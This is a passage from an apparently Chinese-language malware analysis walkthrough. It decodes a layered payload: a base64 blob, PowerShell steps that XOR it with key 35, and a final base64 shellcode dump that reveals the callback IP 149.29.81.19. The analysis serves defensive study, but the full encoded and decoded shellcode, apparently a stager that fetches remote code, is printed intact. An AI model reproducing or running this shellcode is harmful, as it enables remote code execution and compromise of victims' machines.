38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSEwodIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg

第三次解密

再次解密后发现又是一个乱码，说明又有什么加密处理方式我们没注意到：

三次解密

看明文可知，在下面的代码里进行了按位异或运算：

1
2
3

for ($x = 0; $x -lt $var_code.Count; $x++) {
        $var_code[$x] = $var_code[$x] -bxor 35
}

打开powershell，原封不动的从明文拷贝以下指令：

PS C:\Users\Key> [Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSEwodIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg')
PS C:\Users\Key> for ($x = 0; $x -lt $var_code.Count; $x++) {
>>         $var_code[$x] = $var_code[$x] -bxor 35
>> }
PS C:\Users\Key>

此时，再对异或运算之后$var_code这一变量进行base64逆运算，此时会报错：

不过无所谓，把出错的base64值，也就是下面的值用linux里的base64再次解密即可：

/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1
jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6AAAAAAx/1dX
V1dXaDpWeaf/1emkAAAAWzHJUVFqA1FRaLsBAABTUGhXiZ/G/9VQ6YwAAABbMdJSaAAywIRSUlJTUlBo61UuO//VicaDw1BogDMAAIngagRQah9WaHVGnob
/1V8x/1dXav9TVmgtBhh7/9WFwA+EygEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3UHWFDpe////zH/6ZEBAA
DpyQEAAOhv////L0VaV2YAa28LV6sng7G0oIbaiBDktHut9pil2nihyZhKvaLb9YsV20BQVbMVbvY0gXLdl7zFc82aTAicVDzufLmPl2pc99qKeslGGGTnj
gBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgTVNJRSA5LjA7IFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzUuMDsgQk9JRTk7UFRCUikN
CgDbdbima43yEIU7g2aDx/DZaPogZA3M9MxGylj5Xrol0KJJuji+Y/AkFnSnEPasLmnsOBNk+fV6h+o5kV2MO2mKFbY3rQtBYVo+wskMBLYTF/aillR1JTF
YAgHpRY2j4qBLKMPXppvi5OqR5scGzevepsQo94oqmm6FTMpgp9bDdMcsPp+u6Ds1+5M+OlGvORMTZxF8PelwXbqQThTAh0W6jsJXnVrtu9YIKMcLQYBvdf
YGsadQ39VGHha62HToaICIWSUwV0/JM3jFU2hn+d99UJmClkEAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk7kAAAAAAdlRU4nnV2gAIAAAU1ZoEpaJ4
v/VhcB0xosHAcOFwHXlWMPoif3//zE0OS4yOC44MS4xOQAAAAAD

结果图如下，可知道IP地址为149.29.81.19。

最终解密结果